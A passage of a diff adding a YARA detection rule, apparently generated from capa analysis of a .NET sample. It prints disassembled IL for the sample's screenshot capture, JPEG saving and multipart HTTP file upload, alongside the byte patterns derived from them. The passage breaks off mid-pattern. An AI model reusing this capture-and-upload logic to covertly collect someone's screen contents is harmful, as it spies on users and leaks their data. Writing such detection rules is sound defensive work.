diff --git a/yara/expected_1c444ebe_692f7fd6.yar b/yara/expected_1c444ebe_692f7fd6.yar
new file mode 100644
index 0000000..72b1498
--- /dev/null
+++ b/yara/expected_1c444ebe_692f7fd6.yar
@@ -0,0 +1,1651 @@ +rule super_rule_1c444 +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "1c444ebeba24dcba8628b7dfe5fec7c6" + strings: + /* +function Reqss.Reqss::b__4d 0x0600006d@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - save image in .NET + 133F 02 ldarg.0 + 1340 7b a8 00 00 04 ldfld _temp_image_ + 1345 02 ldarg.0 + 1346 7b 9e 00 00 04 ldfld _temp_dir1 + 134B 28 63 00 00 0a call System.Drawing.Imaging.ImageFormat::get_Jpeg + 1350 6f 64 00 00 0a callvirt System.Drawing.Image::Save + 1355 2a ret + */ + $c0 = { 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A } + /* +function Screenss.ScreenCapture::CaptureWindow 0x06000073@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - capture screenshot + - unmanaged call + 1F74 03 ldarg.1 + 1F75 28 7d 00 00 06 call GetWindowDC + 1F7A 0a stloc.0 + 1F7B 12 01 ldloca.s local(0x0001) + 1F7D fe 15 0a 00 00 02 initobj .RECT + 1F83 03 ldarg.1 + 1F84 12 01 ldloca.s local(0x0001) + 1F86 28 7f 00 00 06 call GetWindowRect + 1F8B 26 pop + 1F8C 12 01 ldloca.s local(0x0001) + 1F8E 7b 7b 00 00 04 ldfld right + 1F93 12 01 ldloca.s local(0x0001) + 1F95 7b 79 00 00 04 ldfld left + 1F9A 59 sub + 1F9B 0c stloc.2 + 1F9C 12 01 ldloca.s local(0x0001) + 1F9E 7b 7c 00 00 04 ldfld bottom + 1FA3 12 01 ldloca.s local(0x0001) + 1FA5 7b 7a 00 00 04 ldfld top + 1FAA 59 sub + 1FAB 0d stloc.3 + 1FAC 06 ldloc.0 + 1FAD 28 77 00 00 06 call CreateCompatibleDC + 1FB2 13 04 stloc.s local(0x0004) + 1FB4 06 ldloc.0 + 1FB5 08 ldloc.2 + 1FB6 09 ldloc.3 + 1FB7 28 76 00 00 06 call CreateCompatibleBitmap + 1FBC 13 05 stloc.s local(0x0005) + 1FBE 11 04 ldloc.s local(0x0004) + 1FC0 11 05 ldloc.s local(0x0005) + 1FC2 28 7a 00 00 06 call SelectObject + 1FC7 13 06 stloc.s local(0x0006) + 1FC9 11 04 ldloc.s local(0x0004) + 1FCB 16 ldc.i4.0 + 1FCC 16 ldc.i4.0 + 1FCD 08 ldloc.2 + 1FCE 09 ldloc.3 + 1FCF 06 ldloc.0 + 1FD0 16 ldc.i4.0 + 1FD1 16 ldc.i4.0 + 1FD2 20 20 00 
cc 00 ldc.i4 0xcc0020 + 1FD7 28 75 00 00 06 call BitBlt + 1FDC 26 pop + 1FDD 11 04 ldloc.s local(0x0004) + 1FDF 11 06 ldloc.s local(0x0006) + 1FE1 28 7a 00 00 06 call SelectObject + 1FE6 26 pop + 1FE7 11 04 ldloc.s local(0x0004) + 1FE9 28 78 00 00 06 call DeleteDC + 1FEE 26 pop + 1FEF 03 ldarg.1 + 1FF0 06 ldloc.0 + 1FF1 28 7e 00 00 06 call ReleaseDC + 1FF6 26 pop + 1FF7 11 05 ldloc.s local(0x0005) + 1FF9 28 65 00 00 0a call System.Drawing.Image::FromHbitmap + 1FFE 13 07 stloc.s local(0x0007) + 2000 11 05 ldloc.s local(0x0005) + 2002 28 79 00 00 06 call DeleteObject + 2007 26 pop + 2008 11 07 ldloc.s local(0x0007) + 200A 2a ret + */ + $c1 = { 03 28 ?? ?? ?? ?? 0A 12 ?? FE 15 ?? ?? ?? ?? 03 12 ?? 28 ?? ?? ?? ?? 26 12 ?? 7B ?? ?? ?? ?? 12 ?? 7B ?? ?? ?? ?? 59 0C 12 ?? 7B ?? ?? ?? ?? 12 ?? 7B ?? ?? ?? ?? 59 0D 06 28 ?? ?? ?? ?? 13 ?? 06 08 09 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 16 08 09 06 16 16 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 11 ?? 11 ?? 28 ?? ?? ?? ?? 26 11 ?? 28 ?? ?? ?? ?? 26 03 06 28 ?? ?? ?? ?? 26 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 26 11 ?? 
2A } + /* +function Uploadss.Uploadss::MultiPart 0x06000096@1c444ebeba24dcba8628b7dfe5fec7c6 with 7 features: + - create HTTP request + - get file size + - receive HTTP response + - send HTTP request + - send data + - send request in .NET + - set web proxy in .NET + 2AA8 72 01 00 00 70 ldstr "" + 2AAD 0a stloc.0 + 2AAE 03 ldarg.1 + 2AAF 28 97 00 00 0a call System.Net.WebRequest::Create + 2AB4 74 58 00 00 01 castclass System.Net.HttpWebRequest + 2AB9 0b stloc.1 + 2ABA 07 ldloc.1 + 2ABB 1c ldc.i4.6 + 2ABC 73 98 00 00 0a newobj System.Net.Cache.RequestCachePolicy::.ctor + 2AC1 6f 99 00 00 0a callvirt System.Net.WebRequest::set_CachePolicy + 2AC6 07 ldloc.1 + 2AC7 14 ldnull + 2AC8 6f 9a 00 00 0a callvirt System.Net.WebRequest::set_Proxy + 2ACD 07 ldloc.1 + 2ACE 19 ldc.i4.3 + 2ACF 6f 9b 00 00 0a callvirt System.Net.HttpWebRequest::set_AutomaticDecompression + 2AD4 07 ldloc.1 + 2AD5 20 30 75 00 00 ldc.i4 0x7530 + 2ADA 6f 9c 00 00 0a callvirt System.Net.WebRequest::set_Timeout + 2ADF 07 ldloc.1 + 2AE0 28 9d 00 00 0a call System.Text.Encoding::get_Default + 2AE5 1a ldc.i4.4 + 2AE6 8d 3d 00 00 01 newarr System.Byte + 2AEB 25 dup + 2AEC d0 b1 00 00 04 ldtoken $$method0x600002a-1 + 2AF1 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2AF6 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2AFB 6f 9f 00 00 0a callvirt System.Net.WebRequest::set_Method + 2B00 28 a0 00 00 0a call System.DateTime::get_UtcNow + 2B05 13 1e stloc.s local(0x001E) + 2B07 12 1e ldloca.s local(0x001E) + 2B09 20 b2 07 00 00 ldc.i4 0x7b2 + 2B0E 17 ldc.i4.1 + 2B0F 17 ldc.i4.1 + 2B10 73 a1 00 00 0a newobj System.DateTime::.ctor + 2B15 28 a2 00 00 0a call System.DateTime::Subtract + 2B1A 13 1f stloc.s local(0x001F) + 2B1C 12 1f ldloca.s local(0x001F) + 2B1E 28 a3 00 00 0a call System.TimeSpan::get_TotalMilliseconds + 2B23 6a conv.i8 + 2B24 0c stloc.2 + 2B25 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B2A 1f 14 ldc.i4.s 0x14 + 2B2C 8d 3d 00 00 01 newarr 
System.Byte + 2B31 25 dup + 2B32 d0 b2 00 00 04 ldtoken $$method0x600002a-2 + 2B37 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2B3C 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2B41 0d stloc.3 + 2B42 09 ldloc.3 + 2B43 08 ldloc.2 + 2B44 8c 31 00 00 01 box System.Int64 + 2B49 28 52 00 00 0a call System.String::Concat + 2B4E 13 04 stloc.s local(0x0004) + 2B50 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B55 18 ldc.i4.2 + 2B56 8d 3d 00 00 01 newarr System.Byte + 2B5B 13 20 stloc.s local(0x0020) + 2B5D 11 20 ldloc.s local(0x0020) + 2B5F 16 ldc.i4.0 + 2B60 1f 0d ldc.i4.s 0xd + 2B62 9c stelem.i1 + 2B63 11 20 ldloc.s local(0x0020) + 2B65 17 ldc.i4.1 + 2B66 1f 0a ldc.i4.s 0xa + 2B68 9c stelem.i1 + 2B69 11 20 ldloc.s local(0x0020) + 2B6B 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2B70 26 pop + 2B71 07 ldloc.1 + 2B72 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B77 1f 21 ldc.i4.s 0x21 + 2B79 8d 3d 00 00 01 newarr System.Byte + 2B7E 25 dup + 2B7F d0 b3 00 00 04 ldtoken $$method0x600002a-3 + 2B84 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2B89 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2B8E 11 04 ldloc.s local(0x0004) + 2B90 28 a4 00 00 0a call System.String::Format + 2B95 6f a5 00 00 0a callvirt System.Net.WebRequest::set_ContentType + 2B9A 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B9F 18 ldc.i4.2 + 2BA0 8d 3d 00 00 01 newarr System.Byte + 2BA5 13 21 stloc.s local(0x0021) + 2BA7 11 21 ldloc.s local(0x0021) + 2BA9 16 ldc.i4.0 + 2BAA 1f 2d ldc.i4.s 0x2d + 2BAC 9c stelem.i1 + 2BAD 11 21 ldloc.s local(0x0021) + 2BAF 17 ldc.i4.1 + 2BB0 1f 2d ldc.i4.s 0x2d + 2BB2 9c stelem.i1 + 2BB3 11 21 ldloc.s local(0x0021) + 2BB5 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2BBA 11 04 ldloc.s local(0x0004) + 2BBC 28 50 00 00 0a call System.String::Concat + 2BC1 13 04 stloc.s local(0x0004) + 2BC3 28 29 00 00 0a call 
System.Text.Encoding::get_UTF8 + 2BC8 11 04 ldloc.s local(0x0004) + 2BCA 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2BCF 13 05 stloc.s local(0x0005) + 2BD1 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2BD6 1f 2e ldc.i4.s 0x2e + 2BD8 8d 3d 00 00 01 newarr System.Byte + 2BDD 25 dup + 2BDE d0 b4 00 00 04 ldtoken $$method0x600002a-4 + 2BE3 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2BE8 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2BED 13 06 stloc.s local(0x0006) + 2BEF 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2BF4 1f 51 ldc.i4.s 0x51 + 2BF6 8d 3d 00 00 01 newarr System.Byte + 2BFB 25 dup + 2BFC d0 b5 00 00 04 ldtoken $$method0x600002a-5 + 2C01 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2C06 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2C0B 13 07 stloc.s local(0x0007) + 2C0D 16 ldc.i4.0 + 2C0E 6a conv.i8 + 2C0F 13 08 stloc.s local(0x0008) + 2C11 11 08 ldloc.s local(0x0008) + 2C13 11 05 ldloc.s local(0x0005) + 2C15 8e ldlen + 2C16 69 conv.i4 + 2C17 6a conv.i8 + 2C18 58 add + 2C19 13 08 stloc.s local(0x0008) + 2C1B 04 ldarg.2 + 2C1C 6f a6 00 00 0a callvirt GetEnumerator + 2C21 13 22 stloc.s local(0x0022) + 2C23 2b 5a br.s 0x2c7f + 2C25 12 22 ldloca.s local(0x0022) + 2C27 28 a7 00 00 0a call get_Current + 2C2C 13 09 stloc.s local(0x0009) + 2C2E 11 06 ldloc.s local(0x0006) + 2C30 11 09 ldloc.s local(0x0009) + 2C32 7b a9 00 00 04 ldfld name + 2C37 28 a4 00 00 0a call System.String::Format + 2C3C 11 09 ldloc.s local(0x0009) + 2C3E 7b aa 00 00 04 ldfld value + 2C43 28 a8 00 00 0a call System.Uri::EscapeDataString + 2C48 28 50 00 00 0a call System.String::Concat + 2C4D 13 0a stloc.s local(0x000A) + 2C4F 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2C54 11 0a ldloc.s local(0x000A) + 2C56 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2C5B 13 0b stloc.s local(0x000B) + 2C5D 11 08 ldloc.s local(0x0008) + 2C5F 18 
ldc.i4.2 + 2C60 6a conv.i8 + 2C61 58 add + 2C62 13 08 stloc.s local(0x0008) + 2C64 11 08 ldloc.s local(0x0008) + 2C66 11 0b ldloc.s local(0x000B) + 2C68 8e ldlen + 2C69 69 conv.i4 + 2C6A 6a conv.i8 + 2C6B 58 add + 2C6C 13 08 stloc.s local(0x0008) + 2C6E 11 08 ldloc.s local(0x0008) + 2C70 18 ldc.i4.2 + 2C71 6a conv.i8 + 2C72 58 add + 2C73 13 08 stloc.s local(0x0008) + 2C75 11 08 ldloc.s local(0x0008) + 2C77 11 05 ldloc.s local(0x0005) + 2C79 8e ldlen + 2C7A 69 conv.i4 + 2C7B 6a conv.i8 + 2C7C 58 add + 2C7D 13 08 stloc.s local(0x0008) + 2C7F 12 22 ldloca.s local(0x0022) + 2C81 28 a9 00 00 0a call MoveNext + 2C86 2d 9d brtrue.s 0x2c25 + 2C88 de 0e leave.s 0x2c98 + 2C8A 12 22 ldloca.s local(0x0022) + 2C8C fe 16 07 00 00 1b constrained. [CLR_METADATA_TABLE_TYPESPEC] + 0x7032 0x0 Signature_BlobIndex: 5CF + 2C92 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2C97 dc endfinally + 2C98 05 ldarg.3 + 2C99 6f aa 00 00 0a callvirt GetEnumerator + 2C9E 13 23 stloc.s local(0x0023) + 2CA0 2b 76 br.s 0x2d18 + 2CA2 12 23 ldloca.s local(0x0023) + 2CA4 28 ab 00 00 0a call get_Current + 2CA9 13 0c stloc.s local(0x000C) + 2CAB 11 07 ldloc.s local(0x0007) + 2CAD 11 0c ldloc.s local(0x000C) + 2CAF 7b ab 00 00 04 ldfld name + 2CB4 11 0c ldloc.s local(0x000C) + 2CB6 7b ac 00 00 04 ldfld filepath + 2CBB 28 ac 00 00 0a call System.IO.Path::GetFileName + 2CC0 11 0c ldloc.s local(0x000C) + 2CC2 7b ad 00 00 04 ldfld contenttype + 2CC7 28 ad 00 00 0a call System.String::Format + 2CCC 13 0d stloc.s local(0x000D) + 2CCE 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2CD3 11 0d ldloc.s local(0x000D) + 2CD5 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2CDA 13 0e stloc.s local(0x000E) + 2CDC 11 08 ldloc.s local(0x0008) + 2CDE 18 ldc.i4.2 + 2CDF 6a conv.i8 + 2CE0 58 add + 2CE1 13 08 stloc.s local(0x0008) + 2CE3 11 08 ldloc.s local(0x0008) + 2CE5 11 0e ldloc.s local(0x000E) + 2CE7 8e ldlen + 2CE8 69 conv.i4 + 2CE9 6a conv.i8 + 2CEA 58 add + 2CEB 13 08 stloc.s local(0x0008) + 
2CED 11 0c ldloc.s local(0x000C) + 2CEF 7b ac 00 00 04 ldfld filepath + 2CF4 73 24 00 00 0a newobj System.IO.FileInfo::.ctor + 2CF9 13 0f stloc.s local(0x000F) + 2CFB 11 08 ldloc.s local(0x0008) + 2CFD 11 0f ldloc.s local(0x000F) + 2CFF 6f 4f 00 00 0a callvirt System.IO.FileInfo::get_Length + 2D04 58 add + 2D05 13 08 stloc.s local(0x0008) + 2D07 11 08 ldloc.s local(0x0008) + 2D09 18 ldc.i4.2 + 2D0A 6a conv.i8 + 2D0B 58 add + 2D0C 13 08 stloc.s local(0x0008) + 2D0E 11 08 ldloc.s local(0x0008) + 2D10 11 05 ldloc.s local(0x0005) + 2D12 8e ldlen + 2D13 69 conv.i4 + 2D14 6a conv.i8 + 2D15 58 add + 2D16 13 08 stloc.s local(0x0008) + 2D18 12 23 ldloca.s local(0x0023) + 2D1A 28 ae 00 00 0a call MoveNext + 2D1F 2d 81 brtrue.s 0x2ca2 + 2D21 de 0e leave.s 0x2d31 + 2D23 12 23 ldloca.s local(0x0023) + 2D25 fe 16 08 00 00 1b constrained. [CLR_METADATA_TABLE_TYPESPEC] + 0x7034 0x0 Signature_BlobIndex: 5DC + 2D2B 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2D30 dc endfinally + 2D31 11 08 ldloc.s local(0x0008) + 2D33 18 ldc.i4.2 + 2D34 6a conv.i8 + 2D35 58 add + 2D36 13 08 stloc.s local(0x0008) + 2D38 11 08 ldloc.s local(0x0008) + 2D3A 18 ldc.i4.2 + 2D3B 6a conv.i8 + 2D3C 58 add + 2D3D 13 08 stloc.s local(0x0008) + 2D3F 07 ldloc.1 + 2D40 11 08 ldloc.s local(0x0008) + 2D42 6f af 00 00 0a callvirt System.Net.WebRequest::set_ContentLength + 2D47 07 ldloc.1 + 2D48 6f b0 00 00 0a callvirt System.Net.WebRequest::GetRequestStream + 2D4D 13 10 stloc.s local(0x0010) + 2D4F 11 10 ldloc.s local(0x0010) + 2D51 11 05 ldloc.s local(0x0005) + 2D53 16 ldc.i4.0 + 2D54 11 05 ldloc.s local(0x0005) + 2D56 8e ldlen + 2D57 69 conv.i4 + 2D58 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2D5D 04 ldarg.2 + 2D5E 6f a6 00 00 0a callvirt GetEnumerator + 2D63 13 24 stloc.s local(0x0024) + 2D65 38 92 00 00 00 br 0x2dfc + 2D6A 12 24 ldloca.s local(0x0024) + 2D6C 28 a7 00 00 0a call get_Current + 2D71 13 11 stloc.s local(0x0011) + 2D73 11 06 ldloc.s local(0x0006) + 2D75 11 11 ldloc.s local(0x0011) + 
2D77 7b a9 00 00 04 ldfld name + 2D7C 28 a4 00 00 0a call System.String::Format + 2D81 11 11 ldloc.s local(0x0011) + 2D83 7b aa 00 00 04 ldfld value + 2D88 28 a8 00 00 0a call System.Uri::EscapeDataString + 2D8D 28 50 00 00 0a call System.String::Concat + 2D92 13 12 stloc.s local(0x0012) + 2D94 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2D99 11 12 ldloc.s local(0x0012) + 2D9B 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2DA0 13 13 stloc.s local(0x0013) + 2DA2 11 10 ldloc.s local(0x0010) + 2DA4 18 ldc.i4.2 + 2DA5 8d 3d 00 00 01 newarr System.Byte + 2DAA 13 25 stloc.s local(0x0025) + 2DAC 11 25 ldloc.s local(0x0025) + 2DAE 16 ldc.i4.0 + 2DAF 1f 0d ldc.i4.s 0xd + 2DB1 9c stelem.i1 + 2DB2 11 25 ldloc.s local(0x0025) + 2DB4 17 ldc.i4.1 + 2DB5 1f 0a ldc.i4.s 0xa + 2DB7 9c stelem.i1 + 2DB8 11 25 ldloc.s local(0x0025) + 2DBA 16 ldc.i4.0 + 2DBB 18 ldc.i4.2 + 2DBC 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DC1 11 10 ldloc.s local(0x0010) + 2DC3 11 13 ldloc.s local(0x0013) + 2DC5 16 ldc.i4.0 + 2DC6 11 13 ldloc.s local(0x0013) + 2DC8 8e ldlen + 2DC9 69 conv.i4 + 2DCA 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DCF 11 10 ldloc.s local(0x0010) + 2DD1 18 ldc.i4.2 + 2DD2 8d 3d 00 00 01 newarr System.Byte + 2DD7 13 26 stloc.s local(0x0026) + 2DD9 11 26 ldloc.s local(0x0026) + 2DDB 16 ldc.i4.0 + 2DDC 1f 0d ldc.i4.s 0xd + 2DDE 9c stelem.i1 + 2DDF 11 26 ldloc.s local(0x0026) + 2DE1 17 ldc.i4.1 + 2DE2 1f 0a ldc.i4.s 0xa + 2DE4 9c stelem.i1 + 2DE5 11 26 ldloc.s local(0x0026) + 2DE7 16 ldc.i4.0 + 2DE8 18 ldc.i4.2 + 2DE9 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DEE 11 10 ldloc.s local(0x0010) + 2DF0 11 05 ldloc.s local(0x0005) + 2DF2 16 ldc.i4.0 + 2DF3 11 05 ldloc.s local(0x0005) + 2DF5 8e ldlen + 2DF6 69 conv.i4 + 2DF7 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DFC 12 24 ldloca.s local(0x0024) + 2DFE 28 a9 00 00 0a call MoveNext + 2E03 3a 62 ff ff ff brtrue 0x2d6a + 2E08 de 0e leave.s 0x2e18 + 2E0A 12 24 ldloca.s local(0x0024) + 2E0C 
fe 16 07 00 00 1b constrained. [CLR_METADATA_TABLE_TYPESPEC] + 0x7032 0x0 Signature_BlobIndex: 5CF + 2E12 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2E17 dc endfinally + 2E18 05 ldarg.3 + 2E19 6f aa 00 00 0a callvirt GetEnumerator + 2E1E 13 27 stloc.s local(0x0027) + 2E20 38 ea 00 00 00 br 0x2f0f + 2E25 12 27 ldloca.s local(0x0027) + 2E27 28 ab 00 00 0a call get_Current + 2E2C 13 14 stloc.s local(0x0014) + 2E2E 11 07 ldloc.s local(0x0007) + 2E30 11 14 ldloc.s local(0x0014) + 2E32 7b ab 00 00 04 ldfld name + 2E37 11 14 ldloc.s local(0x0014) + 2E39 7b ac 00 00 04 ldfld filepath + 2E3E 28 ac 00 00 0a call System.IO.Path::GetFileName + 2E43 11 14 ldloc.s local(0x0014) + 2E45 7b ad 00 00 04 ldfld contenttype + 2E4A 28 ad 00 00 0a call System.String::Format + 2E4F 13 15 stloc.s local(0x0015) + 2E51 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2E56 11 15 ldloc.s local(0x0015) + 2E58 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2E5D 13 16 stloc.s local(0x0016) + 2E5F 11 10 ldloc.s local(0x0010) + 2E61 18 ldc.i4.2 + 2E62 8d 3d 00 00 01 newarr System.Byte + 2E67 13 28 stloc.s local(0x0028) + 2E69 11 28 ldloc.s local(0x0028) + 2E6B 16 ldc.i4.0 + 2E6C 1f 0d ldc.i4.s 0xd + 2E6E 9c stelem.i1 + 2E6F 11 28 ldloc.s local(0x0028) + 2E71 17 ldc.i4.1 + 2E72 1f 0a ldc.i4.s 0xa + 2E74 9c stelem.i1 + 2E75 11 28 ldloc.s local(0x0028) + 2E77 16 ldc.i4.0 + 2E78 18 ldc.i4.2 + 2E79 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2E7E 11 10 ldloc.s local(0x0010) + 2E80 11 16 ldloc.s local(0x0016) + 2E82 16 ldc.i4.0 + 2E83 11 16 ldloc.s local(0x0016) + 2E85 8e ldlen + 2E86 69 conv.i4 + 2E87 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2E8C 11 14 ldloc.s local(0x0014) + 2E8E 7b ac 00 00 04 ldfld filepath + 2E93 19 ldc.i4.3 + 2E94 17 ldc.i4.1 + 2E95 73 b1 00 00 0a newobj System.IO.FileStream::.ctor + 2E9A 13 17 stloc.s local(0x0017) + 2E9C 20 00 00 10 00 ldc.i4 0x100000 + 2EA1 8d 3d 00 00 01 newarr System.Byte + 2EA6 13 18 stloc.s local(0x0018) + 2EA8 11 17 
ldloc.s local(0x0017) + 2EAA 11 18 ldloc.s local(0x0018) + 2EAC 16 ldc.i4.0 + 2EAD 11 18 ldloc.s local(0x0018) + 2EAF 8e ldlen + 2EB0 69 conv.i4 + 2EB1 6f 84 00 00 0a callvirt System.IO.Stream::Read + 2EB6 13 19 stloc.s local(0x0019) + 2EB8 2b 1c br.s 0x2ed6 + 2EBA 11 10 ldloc.s local(0x0010) + 2EBC 11 18 ldloc.s local(0x0018) + 2EBE 16 ldc.i4.0 + 2EBF 11 19 ldloc.s local(0x0019) + 2EC1 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2EC6 11 17 ldloc.s local(0x0017) + 2EC8 11 18 ldloc.s local(0x0018) + 2ECA 16 ldc.i4.0 + 2ECB 11 18 ldloc.s local(0x0018) + 2ECD 8e ldlen + 2ECE 69 conv.i4 + 2ECF 6f 84 00 00 0a callvirt System.IO.Stream::Read + 2ED4 13 19 stloc.s local(0x0019) + 2ED6 11 19 ldloc.s local(0x0019) + 2ED8 16 ldc.i4.0 + 2ED9 30 df bgt.s 0x2eba + 2EDB 11 17 ldloc.s local(0x0017) + 2EDD 6f b2 00 00 0a callvirt System.IO.Stream::Close + 2EE2 11 10 ldloc.s local(0x0010) + 2EE4 18 ldc.i4.2 + 2EE5 8d 3d 00 00 01 newarr System.Byte + 2EEA 13 29 stloc.s local(0x0029) + 2EEC 11 29 ldloc.s local(0x0029) + 2EEE 16 ldc.i4.0 + 2EEF 1f 0d ldc.i4.s 0xd + 2EF1 9c stelem.i1 + 2EF2 11 29 ldloc.s local(0x0029) + 2EF4 17 ldc.i4.1 + 2EF5 1f 0a ldc.i4.s 0xa + 2EF7 9c stelem.i1 + 2EF8 11 29 ldloc.s local(0x0029) + 2EFA 16 ldc.i4.0 + 2EFB 18 ldc.i4.2 + 2EFC 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F01 11 10 ldloc.s local(0x0010) + 2F03 11 05 ldloc.s local(0x0005) + 2F05 16 ldc.i4.0 + 2F06 11 05 ldloc.s local(0x0005) + 2F08 8e ldlen + 2F09 69 conv.i4 + 2F0A 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F0F 12 27 ldloca.s local(0x0027) + 2F11 28 ae 00 00 0a call MoveNext + 2F16 3a 0a ff ff ff brtrue 0x2e25 + 2F1B de 0e leave.s 0x2f2b + 2F1D 12 27 ldloca.s local(0x0027) + 2F1F fe 16 08 00 00 1b constrained. 
[CLR_METADATA_TABLE_TYPESPEC] + 0x7034 0x0 Signature_BlobIndex: 5DC + 2F25 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2F2A dc endfinally + 2F2B 11 10 ldloc.s local(0x0010) + 2F2D 18 ldc.i4.2 + 2F2E 8d 3d 00 00 01 newarr System.Byte + 2F33 13 2a stloc.s local(0x002A) + 2F35 11 2a ldloc.s local(0x002A) + 2F37 16 ldc.i4.0 + 2F38 1f 2d ldc.i4.s 0x2d + 2F3A 9c stelem.i1 + 2F3B 11 2a ldloc.s local(0x002A) + 2F3D 17 ldc.i4.1 + 2F3E 1f 2d ldc.i4.s 0x2d + 2F40 9c stelem.i1 + 2F41 11 2a ldloc.s local(0x002A) + 2F43 16 ldc.i4.0 + 2F44 18 ldc.i4.2 + 2F45 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F4A 11 10 ldloc.s local(0x0010) + 2F4C 18 ldc.i4.2 + 2F4D 8d 3d 00 00 01 newarr System.Byte + 2F52 13 2b stloc.s local(0x002B) + 2F54 11 2b ldloc.s local(0x002B) + 2F56 16 ldc.i4.0 + 2F57 1f 0d ldc.i4.s 0xd + 2F59 9c stelem.i1 + 2F5A 11 2b ldloc.s local(0x002B) + 2F5C 17 ldc.i4.1 + 2F5D 1f 0a ldc.i4.s 0xa + 2F5F 9c stelem.i1 + 2F60 11 2b ldloc.s local(0x002B) + 2F62 16 ldc.i4.0 + 2F63 18 ldc.i4.2 + 2F64 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F69 11 10 ldloc.s local(0x0010) + 2F6B 6f 8a 00 00 0a callvirt System.IO.Stream::Flush + 2F70 11 10 ldloc.s local(0x0010) + 2F72 6f b2 00 00 0a callvirt System.IO.Stream::Close + 2F77 07 ldloc.1 + 2F78 6f b3 00 00 0a callvirt System.Net.WebRequest::GetResponse + 2F7D 74 67 00 00 01 castclass System.Net.HttpWebResponse + 2F82 13 1a stloc.s local(0x001A) + 2F84 11 1a ldloc.s local(0x001A) + 2F86 6f b4 00 00 0a callvirt System.Net.WebResponse::GetResponseStream + 2F8B 13 1b stloc.s local(0x001B) + 2F8D 11 1b ldloc.s local(0x001B) + 2F8F 73 b5 00 00 0a newobj System.IO.StreamReader::.ctor + 2F94 13 1c stloc.s local(0x001C) + 2F96 11 1c ldloc.s local(0x001C) + 2F98 6f b6 00 00 0a callvirt System.IO.TextReader::ReadToEnd + 2F9D 0a stloc.0 + 2F9E 11 1c ldloc.s local(0x001C) + 2FA0 6f b7 00 00 0a callvirt System.IO.TextReader::Close + 2FA5 11 1b ldloc.s local(0x001B) + 2FA7 6f b2 00 00 0a callvirt System.IO.Stream::Close + 
2FAC 11 1a ldloc.s local(0x001A) + 2FAE 6f b8 00 00 0a callvirt System.Net.WebResponse::Close + 2FB3 de 18 leave.s 0x2fcd + 2FB5 13 1d stloc.s local(0x001D) + 2FB7 11 1d ldloc.s local(0x001D) + 2FB9 6f b9 00 00 0a callvirt System.Net.WebException::get_Response + 2FBE 6f b8 00 00 0a callvirt System.Net.WebResponse::Close + 2FC3 de 03 leave.s 0x2fc8 + 2FC5 26 pop + 2FC6 de 00 leave.s 0x2fc8 + 2FC8 de 03 leave.s 0x2fcd + 2FCA 26 pop + 2FCB de 00 leave.s 0x2fcd + 2FCD 06 ldloc.0 + 2FCE 2a ret + */ + $c2 = { 72 ?? ?? ?? ?? 0A 03 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 0B 07 1C 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 14 6F ?? ?? ?? ?? 07 19 6F ?? ?? ?? ?? 07 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 20 ?? ?? ?? ?? 17 17 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6A 0C 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 